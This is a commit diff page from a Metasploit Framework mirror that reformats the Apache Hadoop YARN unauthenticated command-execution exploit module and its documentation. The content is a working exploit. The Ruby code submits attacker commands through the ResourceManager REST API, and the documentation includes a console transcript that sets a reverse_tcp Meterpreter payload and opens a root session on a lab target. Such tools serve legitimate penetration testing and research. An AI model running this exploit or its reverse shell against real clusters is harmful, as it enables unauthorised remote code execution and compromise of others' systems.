infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean up module 

With a little rubocop -a.
GSoC/Meterpreter_Web_Console
William Vu 2018-07-12 21:32:09 -05:00
parent aa3fcea377
commit 50252c75d6
2 changed files with 40 additions and 41 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
documentation/modules/exploit/linux/http/hadoop_unauth_exec.md
View File

@ -1,21 +1,21 @@
## Description
## Description
This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
## Vulnerable Application
## Vulnerable Application
**Vulnerable Application Link**
**Vulnerable Application Link**
- docker
- docker
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
## Vulnerable Application Installation Setup.
Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d`
Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d`
## Verification Steps
## Verification Steps
Example steps in this format (is also in the PR):
@ -33,11 +33,11 @@ Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up
9. You should get a shell.
## Scenarios
## Scenarios
```
msf5 > use exploit/linux/http/hadoop_unauth_exec
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
msf5 > use exploit/linux/http/hadoop_unauth_exec
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
Module options (exploit/linux/http/hadoop_unauth_exec):
@ -61,11 +61,11 @@ Exploit target:
0 Automatic
msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141
rhost => 192.168.77.141
msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141
rhost => 192.168.77.141
msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
Module options (exploit/linux/http/hadoop_unauth_exec):
@ -97,16 +97,16 @@ Exploit target:
0 Automatic
msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141
msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141
lhost => 192.168.77.141
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit
[*] Started reverse TCP handler on 192.168.77.141:4444
[*] Started reverse TCP handler on 192.168.77.141:4444
[*] Sending Command
[*] Command Stager progress - 100.00% done (763/763 bytes)
[*] Sending stage (853256 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400
meterpreter > getuid
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
```

47
modules/exploits/linux/http/hadoop_unauth_exec.rb
View File

@ -4,6 +4,7 @@
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
@ -18,38 +19,35 @@ class MetasploitModule < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'cbmixx', # Proof of concept
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
'cbmixx', # Proof of concept
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
[ 'URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
['Automatic', {} ],
['Automatic', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 19 2016',
'DefaultTarget' => 0
))
))
register_options([Opt::RPORT(8088)])
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionError => e
rescue Rex::ConnectionError
vprint_error("#{peer} - Connection failed")
return CheckCode::Unknown
end
@ -68,26 +66,27 @@ class MetasploitModule < Msf::Exploit::Remote
def execute_command(cmd, opts = {})
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)
app_id = res.get_json_document['application-id']
post = {
'application-id' => app_id,
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
'application-type' => 'YARN',
'am-container-spec' => {
'commands' => {'command' => cmd.to_s},
'application-id' => app_id,
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
'application-type' => 'YARN',
'am-container-spec' => {
'commands' => {'command' => cmd.to_s}
}
}
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => post.to_json
send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => post.to_json
)
end
end